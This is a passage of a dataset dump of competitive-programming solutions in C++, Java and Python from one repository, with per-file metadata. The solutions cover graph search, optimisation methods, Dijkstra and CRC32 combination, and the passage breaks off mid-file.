_a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.39431238174438477, "alphanum_fraction": 0.3985568881034851, "avg_line_length": 24.053192138671875, "blob_id": "327df94434288d2665af6209f6d30a099ae39c55", "content_id": "aa0236ba001a2dc385e0a9c2716a210725c84e61", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 2356, "license_type": "no_license", "max_line_length": 80, "num_lines": 94, "path": "/trains/neerc/neerc.ifmo.ru.train.2013.10.29/K.java", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "\nimport java.io.*;\nimport java.util.*;\n\npublic class K {\n\n final static String task_name = \"stdin\";\n\n void run() throws IOException {\n int n = nextInt();\n int[] d = new int[n];\n for (int i = 0; i < n; i++) {\n d[i] = nextInt();\n }\n ArrayList<String> ans = new ArrayList<String>(n);\n\n for (int r, x, y, l = 0; l < n;) {\n r = l;\n while (r < n) {\n if (d[r] <= r - l) {\n r--;\n break;\n }\n r++;\n }\n x = r - l + 1;\n\n y = n;\n r = l;\n while (y > 0 && r < n) {\n y = Math.min(y - 1, d[r] - 1);\n if (y <= 0) {\n break;\n }\n r++;\n }\n\n y = r - l + 1;\n\n if (l + x >= n) {\n x = n - l;\n }\n if (l + y >= n) {\n y = n - l;\n }\n\n // pw.println(x + \" \" + y);\n\n 
if (x > y) {\n ans.add((l + 1) + \" \" + (l + x));\n l += x;\n } else {\n ans.add((l + y) + \" \" + (l + 1));\n l += y;\n }\n }\n\n pw.println(ans.size());\n for (String s : ans) {\n pw.println(s);\n }\n\n }\n\n String next() throws IOException {\n while (st == null || !st.hasMoreTokens())\n st = new StringTokenizer(br.readLine());\n return st.nextToken();\n }\n\n int nextInt() throws IOException {\n return Integer.parseInt(next());\n }\n\n String nextLine() throws IOException {\n return br.readLine();\n }\n\n static PrintWriter pw;\n static BufferedReader br;\n static StringTokenizer st;\n\n public static void main(String[] args) throws IOException {\n long timeout = System.currentTimeMillis();\n // br = new BufferedReader(new FileReader(new File(task_name + \".in\")));\n // pw = new PrintWriter(new FileWriter(new File(task_name + \".out\")));\n // while (br.ready())\n br = new BufferedReader(new InputStreamReader(System.in));\n pw = new PrintWriter(System.out);\n new K().run();\n // System.out.println(System.currentTimeMillis() - timeout);\n br.close();\n pw.close();\n }\n}\n" }, { "alpha_fraction": 0.3723487854003906, "alphanum_fraction": 0.393558531999588, "avg_line_length": 15.113924026489258, "blob_id": "6ecca311afa1fbb87700cfc1feddf3594d7a61a9", "content_id": "c3f8b1dd6a8fcc16c7d921d0ac60514cd7e6dd01", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1273, "license_type": "no_license", "max_line_length": 44, "num_lines": 79, "path": "/trains/neerc/neerc.ifmo.ru.train.2013.10.08/B.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdlib>\n#include <iostream>\n#include <stack>\n#include <vector>\n#include <stdio.h>\n#include <queue>\n#define north printf(\"NORTH\\n\"); cin >> s;\n#define west printf(\"WEST\\n\"); cin >> s;\n#define east printf(\"EAST\\n\"); cin >> s;\n#define south printf(\"SOUTH\\n\"); cin >> s;\n#define done printf(\"DONE\\n\"); cin >> s;\n#define ss if(s == 
\"EMPTY\")\n\n\nusing namespace std;\n\nint a[101][101];\nstring s;\n\nvoid bfs(int i, int j)\n{\n a[i][j] = 1;\n if (!a[i - 1][j])\n {\n north\n ss\n {\n bfs(i - 1, j);\n south\n } else\n a[i - 1][j] = 2;\n }\n if (!a[i + 1][j])\n {\n south\n ss\n {\n bfs(i + 1, j);\n north\n } else\n a[i + 1][j] = 2;\n }\n if (!a[i][j + 1])\n {\n east\n ss\n {\n bfs(i, j + 1);\n west\n } else\n a[i][j + 1] = 2;\n }\n if (!a[i][j - 1])\n {\n west\n ss\n {\n bfs(i, j - 1);\n east\n } else\n a[i][j] = 2;\n }\n}\n\nvoid run()\n{\n string s;\n int i = 50, j = 50;\n bfs(i, j);\n done\n}\n\nint main()\n{\n// freopen(\"matching.in\", \"r\", stdin);\n // freopen(\"matching.out\", \"w+\", stdout);\n run();\n return 0;\n}\n" }, { "alpha_fraction": 0.4007633626461029, "alphanum_fraction": 0.4198473393917084, "avg_line_length": 31.75, "blob_id": "47d87cdec038dbd0b38459c568b225344a7632c3", "content_id": "38a8607d42d3db31df42f95623845a7db8cd3802", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 262, "license_type": "no_license", "max_line_length": 68, "num_lines": 8, "path": "/CodeForce/0544/B.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "n, k = map(int, input().split())\ns = [['S'] * n for i in range(n)]\nfor i in range(n):\n for j in range(n):\n if k > 0 and (i + j) % 2 == 0:\n s[i][j] = 'L'\n k -= 1\nprint('NO' if k > 0 else 'YES\\n' + '\\n'.join(''.join(x) for x in s))\n" }, { "alpha_fraction": 0.38260868191719055, "alphanum_fraction": 0.426086962223053, "avg_line_length": 19.909090042114258, "blob_id": "5892fbc9d3f15daa15e8d7add02f86fd7db3e0b2", "content_id": "ef637208fea2ddca47a151d6e9b8d3a85e2b6d57", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 460, "license_type": "no_license", "max_line_length": 42, "num_lines": 22, "path": "/CodeForce/gym/101090/K.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "def ok(n, m):\n if n == 1 or m 
== 1:\n return False\n if n == 2:\n return m % 3 == 0\n if m == 2:\n return n % 3 == 0\n\n if n % 2 == 0 and m % 3 == 0:\n return True\n if n % 3 == 0 and m % 2 == 0:\n return True\n if n % 6 == 0:\n return True\n if m % 6 == 0:\n return True\n return False\n\n\nfor T in range(int(input())):\n n, m = list(map(int, input().split()))\n print('Yes' if ok(n, m) else 'No')\n" }, { "alpha_fraction": 0.4888093173503876, "alphanum_fraction": 0.5071620345115662, "avg_line_length": 30.91428565979004, "blob_id": "663eba0df2b564f890c7bd10b2efa2d91420e730", "content_id": "3820ccce215e5e032a44dabdda9d3868df3efdbf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4468, "license_type": "no_license", "max_line_length": 174, "num_lines": 140, "path": "/2022/snws4/B.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <bits/stdc++.h>\n#ifdef ONLINE_JUDGE\n#pragma GCC target(\"avx2,bmi,bmi2,lzcnt,popcnt\")\n#endif\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) 
int a; readln(a)\n\n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\n#define ttt12i template<class T1, class T2> inline\n#define ttti template<class T> inline\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\ntemplate<class... Args> inline void readln(Args&... args){(read(args),...);}\ntemplate<class H, class...T> inline void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\n\n//Igorjan\n//}}}\nconst int N = 4096;\nconst int Z = 26;\nconst int M = N + N;\nint a[M][Z];\nint sum[M];\nint pref[M][Z + 1];\nint temp[N];\n\nvoid run()\n{\n ints(n, q);\n vector<vector<pii>> g(n);\n fori(n - 1)\n {\n ints(u, v); --u; --v; char c; readln(c);\n g[u].pb({v, c - 'a'});\n g[v].pb({u, c - 'a'});\n }\n fori(n)\n sort(all(g[i]), [](const pii& a, const pii& b) {\n return pair(a.second, a.first) < pair(b.second, b.first);\n });\n\n auto getAutomaton = [&](int S) {\n fori(M) forj(Z) a[i][j] = -1;\n fori(M) sum[i] = 0;\n fori(N) temp[i] = 0;\n int sz = 1;\n auto dfs = [&](auto dfs, int u, int root, int p) -> void {\n if (root)\n sum[root]++;\n for (auto& [v, c]: g[u])\n if (v != p)\n {\n if (a[root][c] == -1)\n a[root][c] = sz++;\n dfs(dfs, v, a[root][c], u);\n }\n };\n dfs(dfs, S, 0, -1);\n\n auto getCount = [&](auto getCount, int root) -> int {\n pref[root][0] = sum[root];\n fori(Z)\n pref[root][i + 1] = pref[root][i] + (a[root][i] == -1 ? 
0 : getCount(getCount, a[root][i]));\n return pref[root][Z];\n };\n getCount(getCount, 0);\n\n auto getAns = [&](auto getAns, int u, int root, int p) -> void {\n for (auto& [v, c]: g[u])\n if (v != p)\n {\n temp[v] = temp[u] + pref[root][c];\n getAns(getAns, v, a[root][c], u);\n }\n };\n getAns(getAns, S, 0, -1);\n };\n vector<pii> requests(q);\n readln(requests);\n vector<int> order(q);\n iota(all(order), 0);\n sort(all(order), [&](const int& a, const int& b) {\n return requests[a] < requests[b];\n });\n vector<int> ans(q);\n int prev = -1;\n\n for (const int& i: order)\n {\n auto& [S, F] = requests[i]; --S; --F;\n if (S != prev)\n {\n getAutomaton(S);\n prev = S;\n }\n ans[i] = temp[F];\n }\n for (int x: ans)\n writeln(x);\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false);\n run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.577464759349823, "alphanum_fraction": 0.5985915660858154, "avg_line_length": 46.33333206176758, "blob_id": "a492a4353a7b638165ce77ce24de2b009fa5cd9e", "content_id": "a6d37f7a947bf23c7440b5d8ad47c7f84b8f6b9b", "detected_licenses": [], "is_generated": false, 
"is_vendor": false, "language": "Python", "length_bytes": 142, "license_type": "no_license", "max_line_length": 91, "num_lines": 3, "path": "/2018/yalgoQual/A.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "a = input().split()\nfor i in range(int(input())):\n print(\"Unlucky\" if sum([1 if x in a else 0 for x in input().split()]) < 3 else \"Lucky\")\n" }, { "alpha_fraction": 0.41621044278144836, "alphanum_fraction": 0.4769662022590637, "avg_line_length": 30.200000762939453, "blob_id": "a28a2386219646b4aa3afdf02c83bd9d53f20f9a", "content_id": "2d8976d3eb2909c4ec08884b97f7972376124fc9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 7489, "license_type": "no_license", "max_line_length": 134, "num_lines": 240, "path": "/Ann/multi2.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <bits/stdc++.h>\n#include <ctime>\n\nusing namespace std;\nusing namespace std::placeholders;\n\nstatic const double eps = 0.01;\nstatic const double delta = 0.001;\nstatic const double l = -10., r = 10.;\nstatic const double q11 = 3., q12 = -3., q22 = 4., r1 = -2., r2 = 1.;\n\ndouble f(double x1, double x2)\n{\n return q11 * x1 * x1 + q12 * x1 * x2 + q22 * x2 * x2 + r1 * x1 + r2 * x2;\n /* _ _\n | / 6 -3 \\ * /f1\\ | x /f1\\ = 6*f1*f1-3*f2*f1-3*f1*f2+8*f2*f2\n |_ \\ -3 8 / \\f2/ _| \\f2/\n */\n\n /*\n H = / 6 -3 \\ ; -1 = 1 / 8 3 \\\n \\-3 8 / H 39 \\ 3 6 /\n */\n}\n\ndouble ftemp(std::function<double(double)> f)\n{\r\n auto ff = [f](double x){ return (f(x + delta) - f(x)) / delta;};\n double xk, xprev = r, xprevprev = l;\n do\n {\n xk = xprev - (xprev - xprevprev) * ff(xprev) / (ff(xprev) - ff(xprevprev));\n xprevprev = xprev;\n xprev = xk;\n }\n while (fabs(ff(xk)) > eps);\n return xk;\n}\n\ndouble fx1(double x1, double x2)\n{\n return (f(x1 + delta, x2) - f(x1, x2)) / delta;\n}\n\ndouble fx2(double x1, double x2)\n{\n return (f(x1, x2 + delta) - f(x1, x2)) / delta;\n}\n\nbool 
check(double x1, double x2)\n{\n return (fabs(fx1(x1, x2)) <= eps && fabs(fx2(x1, x2)) <= eps);\n}\n\npair<double, double> coordinateDown()\n{\n double x1 = 0., x2 = 0.;\n int countOfOperations = 0;\n double start = clock();\n double x, temp, mn, val;\n while (!check(x1, x2))\n {\n countOfOperations++;\n x1 = ftemp(bind(f, _1, x2));\n x2 = ftemp(bind(f, x1, _1));\n }\n cout << \"count of operations = \" << countOfOperations << endl << \"time = \" << (clock() - start) / CLOCKS_PER_SEC << endl;\n return {x1, x2};\n}\n\npair<double, double> gradientDownFragmentation()\n{\n double x1 = 0., x2 = 0.;\n int countOfOperations = 0;\n double start = clock();\n double alpha = 1, x11, x21, t;\n while (!check(x1, x2))\n {\n countOfOperations++;\n t = f(x1, x2);\n while (true)\n {\n x11 = x1 - alpha * fx1(x1, x2);\n x21 = x2 - alpha * fx2(x1, x2);\n if (f(x11, x21) > t)\n alpha /= 2;\n else\n break;\n }\n x1 = x11;\n x2 = x21;\n }\n cout << \"count of operations = \" << countOfOperations << endl << \"time = \" << (clock() - start) / CLOCKS_PER_SEC << endl;\n return {x1, x2};\n}\n\npair<double, double> gradientDownConst()\n{\n double x1 = 0., x2 = 0.;\n int countOfOperations = 0;\n double start = clock();\n double alpha = 0.1;\n while (!check(x1, x2))\n {\n countOfOperations++;\n x1 = x1 - alpha * fx1(x1, x2);\n x2 = x2 - alpha * fx2(x1, x2);\n }\n cout << \"count of operations = \" << countOfOperations << endl << \"time = \" << (clock() - start) / CLOCKS_PER_SEC << endl;\n return {x1, x2};\n}\n\npair<double, double> fastestGradientDown()\n{\n double x1 = 0., x2 = 0.;\n int countOfOperations = 0;\n double start = clock();\n double alpha = 1, x11, x21, f1, f2;\n auto fun = [&x1, &x2](double lambda){return f(x1 - lambda * fx1(x1, x2), x2 - lambda * fx2(x1, x2));};\n while (!check(x1, x2))\n {\n countOfOperations++;\n f1 = fx1(x1, x2);\n f2 = fx2(x1, x2);\n alpha = ftemp(bind(fun, _1));\n x1 = x1 - alpha * f1;\n x2 = x2 - alpha * f2;\n }\n cout << \"count of operations = \" << 
countOfOperations << endl << \"time = \" << (clock() - start) / CLOCKS_PER_SEC << endl;\n return {x1, x2};\n}\n\npair<double, double> soprDirection()\n{\n double x1 = 0., x2 = 0.;\n int countOfOperations = 1;\n double start = clock();\n double alpha = 1, beta = 0;\n double f1, f2, p1, p2, f1p, f2p;\n p1 = f1 = fx1(x1, x2);\n p2 = f2 = fx2(x1, x2);\n auto fun = [&x1, &x2, &p1, &p2](double lambda){return f(x1 - lambda * p1, x2 - lambda * p2);};\n alpha = ftemp(bind(fun, _1));\n x1 = x1 - alpha * p1;\n x2 = x2 - alpha * p2;\n while (!check(x1, x2))\n {\n countOfOperations++;\n f1p = f1;\n f2p = f2;\n f1 = fx1(x1, x2);\n f2 = fx2(x1, x2);\n beta = (f1 * f1 + f2 * f2) / (f1p * f1p + f2p * f2p);\n p1 = f1 + beta * p1;\n p2 = f2 + beta * p2;\n alpha = ftemp(bind(fun, _1));\n if (f(x1, x2) <= f(x1 - alpha * p1, x2 - alpha * p2))\n {\n p1 = f1;\n p2 = f2;\n alpha = ftemp(bind(fun, _1));\n }\n x2 = x2 - alpha * p2;\n x1 = x1 - alpha * p1;\n }\n cout << \"count of operations = \" << countOfOperations << endl << \"time = \" << (clock() - start) / CLOCKS_PER_SEC << endl;\n return {x1, x2};\n}\n\npair<double, double> Gradppor()\n{\n double x1 = 0., x2 = 0.;\n int countOfOperations = 1;\n double start = clock();\n double alpha = 1, beta = 0;\n double f1, f2, p1, p2, f1p, f2p, a = 1., b = 0., c = 0., d = 1., q, w, e, r, t, y, u, s, v, h, g, y1, y2;\n auto fun = [&x1, &x2, &p1, &p2](double lambda){return f(x1 - lambda * p1, x2 - lambda * p2);};\n while (!check(x1, x2))\n {\n countOfOperations++;\n f1 = fx1(x1, x2);\n f2 = fx2(x1, x2);\n p1 = a * f1 + b * f2;\n p2 = c * f1 + d * f2;\n alpha = ftemp(bind(fun, _1));\n x1 = x1 - alpha * p1;\n x2 = x2 - alpha * p2;\n y1 = fx1(x1, x2) - f1;\n y2 = fx2(x1, x2) - f2;\n q = a * y1 + b * y2;\n w = c * y1 + d * y2;\n u = q * y1 + w * y2;\n e = (q * y1 * a + q * y2 * c) / u;\n r = (q * y1 * b + q * y2 * d) / u;\n t = (w * y1 * a + w * y2 * c) / u;\n y = (w * y1 * b + w * y2 * d) / u;\n u = (p1 * y1 + p2 * y2) / alpha;\n s = (p1 * p1 * a + p1 * 
p2 * b) / u;\n v = (p1 * p1 * c + p1 * p2 * d) / u;\n h = (p1 * p2 * a + p2 * p2 * b) / u;\n g = (p1 * p2 * c + p2 * p2 * d) / u;\n a = a - e + s;\n b = b - r + v;\n c = c - t + h;\n d = d - y + g;\n }\n cout << \"count of operations = \" << countOfOperations << endl << \"time = \" << (clock() - start) / CLOCKS_PER_SEC << endl;\n return {x1, x2};\n}\n\npair<double, double> newton()\n{\n double x1 = 0., x2 = 0.;\n int countOfOperations = 0;\n double start = clock(), f1, f2, x11, x21;\n while (!check(x1, x2))\n {\n countOfOperations++;\n f1 = fx1(x1, x2);\n f2 = fx2(x1, x2);\n x1 = x1 - (f1 * 2 * q22 - f2 * q12) / (4 * q11 * q22 - q12 * q12);\n x2 = x2 - (-f1 * q12 + f2 * 2 * q11) / (4 * q11 * q22 - q12 * q12);\n }\n cout << \"count of operations = \" << countOfOperations << endl << \"time = \" << (clock() - start) / CLOCKS_PER_SEC << endl;\n return {x1, x2};\n}\n\nint main()\n{\n pair<double, double> temp;\n cout.precision(3);\n cout << \"coordinate down:\\n\" << (temp = coordinateDown()).first << \" \" << temp.second << endl << endl;\n cout << \"gradient down with const:\\n\" << (temp = gradientDownConst()).first << \" \" << temp.second << endl << endl;\n cout << \"gradient down with fragmentation:\\n\" << (temp = gradientDownFragmentation()).first << \" \" << temp.second << endl << endl;\n cout << \"fastest gradient down:\\n\" << (temp = fastestGradientDown()).first << \" \" << temp.second << endl << endl;\n cout << \"sopr direction(Fletchera-Rivsa):\\n\" << (temp = soprDirection()).first << \" \" << temp.second << endl << endl;\n cout << \"newton:\\n\" << (temp = newton()).first << \" \" << temp.second << endl << endl;\n cout << \"gradient p poryadka:\\n\" << (temp = Gradppor()).first << \" \" << temp.second << endl << endl;\n return 0;\n}\n" }, { "alpha_fraction": 0.3856837749481201, "alphanum_fraction": 0.39316239953041077, "avg_line_length": 22.399999618530273, "blob_id": "abaf9d01d2668bd35efe771e3d7b54e9d2ef6b60", "content_id": 
"aceb2f15b4ba6d75fe89832fd041ca8104c60c0d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 936, "license_type": "no_license", "max_line_length": 48, "num_lines": 40, "path": "/CodeForce/0938/D.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define ll long long\n\nint main()\n{\n ios_base::sync_with_stdio(false);\n int n, m;\n cin >> n >> m;\n vector<vector<pair<ll, int>>> g(n);\n for (int i = 0; i < m; ++i)\n {\n int u, v; ll w;\n cin >> u >> v >> w; --u; --v;\n g[u].emplace_back(w, v);\n g[v].emplace_back(w, u);\n }\n vector<ll> d(n);\n set<pair<ll, int>> q;\n for (int i = 0; i < n; ++i)\n cin >> d[i],\n q.insert({d[i], i});\n vector<bool> used(n, false);\n while (!q.empty())\n {\n auto [dist, u] = *q.begin();\n q.erase(q.begin());\n used[u] = true;\n for (auto& [w, v] : g[u])\n if (!used[v] && d[v] > dist + 2 * w)\n q.erase({d[v], v}),\n d[v] = dist + 2 * w,\n q.insert({d[v], v});\n }\n for (int i = 0; i < n; ++i)\n cout << d[i] << \" \\n\"[i == n - 1];\n return 0;\n}\n" }, { "alpha_fraction": 0.46660295128822327, "alphanum_fraction": 0.49357545375823975, "avg_line_length": 28.064815521240234, "blob_id": "ec2dd13e6208c01af5e6b13fb991bec5b7a11b6a", "content_id": "5bdfdc9798f785110c8c7110f380915fc654c021", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 9417, "license_type": "no_license", "max_line_length": 174, "num_lines": 324, "path": "/CodeForce/1275/E1.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. 
C++17 version, modified 14 september 2019 (writeln<T>, main) {{{\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define whole(a) begin(a), end(a)\n#define next next__\n#define prev prev__\n#define count count__\n\n#define ints(a...) int a; readln(a)\n#define wr(args...) err(#args, args)\n\n#define ttt12i template<class T1, class T2> inline\n#define tthti template<class H, class...T> inline\n#define ttta template<class... Args> inline\n#define ttti template<class T> inline\n\nconst int MOD = 1000000007;\nconst int INTMAX = numeric_limits<int>::max();\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\nttta void readln(Args&... 
args){(read(args),...);}tthti void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\nvector<string>split(string&s,string d){vector<string>v;size_t p=0;while((p=s.find(d))!=string::npos)v.pb(s.substr(0,p)),s.erase(0,p+d.length());v.pb(s);return v;}\nttta void err(string v,Args...args){auto vv=split(v,\", \");auto it=vv.begin();(writeln(*it++,\"=\",args),...);}\n\n//Igorjan\n#define CRCPOLY 0xEDB88320\n#define INITXOR 0xFFFFFFFF\n#define FINALXOR 0xFFFFFFFF\n#define uint unsigned int\nvector<uint> table(256), rev_table(256);\n\nvoid make_crc_table() {\n uint c;\n fori(256)\n {\n c = i;\n forj(8)\n if (c & 1)\n c = CRCPOLY ^ (c >> 1);\n else\n c >>= 1;\n table[i] = c;\n }\n}\n\nvoid make_crc_revtable() {\n uint c;\n fori(256)\n {\n c = i << 24;\n forj(8)\n if (c & 0x80000000)\n c = ((c ^ CRCPOLY) << 1) | 1;\n else\n c <<= 1;\n rev_table[i] = c;\n }\n}\n\ntemplate <typename InputIterator>\nuint calc_crc(InputIterator first, InputIterator last)\n{\n uint crcreg = INITXOR;\n for (auto it = first; it != last; ++it)\n crcreg = (crcreg >> 8) ^ table[((crcreg ^ *it) & 0xFF)];\n return crcreg;\n}\n\ntemplate <typename InputIterator>\nuint calc_crc_all(InputIterator first, InputIterator last)\n{\n return calc_crc(first, last) ^ FINALXOR;\n}\n\n//https://github.com/madler/zlib (c)\n#define SIZE 32\n\nuint mtimes(vector<uint>& mat, uint vec)\n{\n uint sum = 0;\n int i = 0;\n while (vec) {\n if (vec & 1)\n sum ^= mat[i];\n vec >>= 1;\n i++;\n }\n return sum;\n}\n\nvoid msquare(vector<uint>& square, vector<uint>& mat)\n{\n fori(SIZE)\n square[i] = mtimes(mat, mat[i]);\n}\n\nvector<uint> EVEN, ODD;\n\nuint crc32_combine(uint crc1, uint crc2, int len2)\n{\n vector<uint> even = EVEN;\n vector<uint> odd = ODD;\n if (len2 <= 0)\n return crc1;\n do {\n msquare(even, odd);\n if (len2 & 1)\n crc1 = mtimes(even, crc1);\n len2 >>= 1;\n\n if (len2 == 0)\n break;\n\n msquare(odd, even);\n if (len2 & 1)\n crc1 = mtimes(odd, crc1);\n len2 >>= 1;\n\n } while (len2 != 0);\n\n crc1 ^= 
crc2;\n return crc1;\n}\n\n//IgorjansparseTable\n//0-indexed, [l, r)\ntemplate<typename T>\nstruct sparseTable\n{\n int n;\n vector<vector<T>> st;\n vector<int> logs;\n typedef function<T (T, T, int)> F;\n F f;\n\n sparseTable(vector<T>& a, F g, function<uint(int)> init)\n {\n n = a.size();\n f = g;\n\n logs.push_back(0);\n logs.push_back(0);\n FOR(i, 2, n + 1) logs.push_back(logs[i / 2] + 1);\n int L = logs.back() + 1;\n st.resize(L, vector<T>(n));\n fori(n)\n st[0][i] = init(i);\n FOR(k, 1, L)\n for (int i = 0; i + (1 << k) <= n; i++)\n st[k][i] = f(st[k - 1][i], st[k - 1][i + (1 << (k - 1))], 1 << (k - 1));\n }\n\n T get(int l, int r)\n {\n T sum = 0;\n for (int j = logs.back(); j >= 0; j--) {\n if ((1 << j) <= r - l + 1) {\n sum = f(sum, st[j][l], 1 << j);\n l += 1 << j;\n }\n }\n return sum;\n }\n};\n//}}}\n\nstruct request\n{\n int i, j, id, crc, l;\n vector<uint> x = {0, 0, 0, 0};\n vector<uint> ans = {0, 0, 0, 0};\n};\n\nistream& operator>>(istream& is, request& r)\n{\n is >> r.i >> r.j >> r.x[0] >> r.x[1] >> r.x[2] >> r.x[3];\n r.crc = calc_crc_all(whole(r.x));\n r.l = r.j - r.i - 4;\n return is;\n}\n\nostream& operator<<(ostream& os, const request& r)\n{\n return os << r.i << \" \" << r.j << \" \" << r.x[0] << \" \" << r.x[1] << \" \" << r.x[2] << \" \" << r.x[3];\n}\n\nvoid run()\n{\n make_crc_table();\n make_crc_revtable();\n EVEN.resize(SIZE);\n ODD.resize(SIZE);\n ODD[0] = CRCPOLY;\n uint row = 1;\n fori1(SIZE) {\n ODD[i] = row;\n row <<= 1;\n }\n\n msquare(EVEN, ODD);\n msquare(ODD, EVEN);\n\n ints(n, q);\n vector<uint> a(n);\n readln(a);\n uint crc = calc_crc_all(whole(a));\n sparseTable<uint> t(a, crc32_combine, [&](int i) { return calc_crc_all(a.begin() + i, a.begin() + i + 1); });\n\n vector<request> requests(q);\n readln(requests); fori(q) requests[i].id = i;\n sort(whole(requests), [](const request& a, const request& b) { return a.j > b.j; });\n //{\n //vector<uint> b = a;\n //reverse(whole(b));\n //sparseTable<uint> tt(b, crc32_combine, 
[&](int i) { return (INITXOR << 8) ^ rev_table[INITXOR >> 24] ^ a[i] ^ FINALXOR; });\n //uint crcreg = INITXOR;\n //fori(n)\n //{\n //crcreg = (crcreg << 8) ^ rev_table[crcreg >> 24] ^ a[i];\n //printf(\"%x\\n%x\\n\\n\", crcreg ^ FINALXOR, tt.get(0, i));\n //}\n //return;\n //}\n\n auto dumpValue = [&](uint value, vector<uint>& ans) {\n forn(k, 4) ans[k] = (value >> k * 8) & 0xFF;\n };\n\n int i = 0;\n uint crcreg = crc ^ FINALXOR;\n for (int j = n - 1; j >= 0; --j)\n {\n for ( ; i < q && requests[i].i < requests[i].j && requests[i].j + 3 == j; ++i)\n {\n auto& r = requests[i];\n uint cur = r.crc;\n if (r.i)\n cur = crc32_combine(t.get(0, r.i - 1), cur, 4);\n if (r.i + 4 < r.j)\n cur = crc32_combine(cur, t.get(r.i + 4, r.j - 1), r.l);\n uint AZB = t.get(0, r.j - 1);\n forn(k, 4) r.x[k] ^= a[r.i + k];\n uint Z = calc_crc_all(whole(r.x));\n Z = crc32_combine(Z, 0, r.l);\n printf(\"%x\\n%x\\n\\n\", cur ^ FINALXOR, AZB ^ Z);\n dumpValue(cur ^ FINALXOR, r.ans);\n\n uint tcrcreg = crcreg;\n forn(k, 4) tcrcreg = (tcrcreg << 8) ^ rev_table[tcrcreg >> 24] ^ r.ans[3 - k];\n dumpValue(tcrcreg, r.ans);\n }\n crcreg = (crcreg << 8) ^ rev_table[crcreg >> 24] ^ a[j];\n }\n\n sort(whole(requests), [](const request& a, const request& b) { return a.id 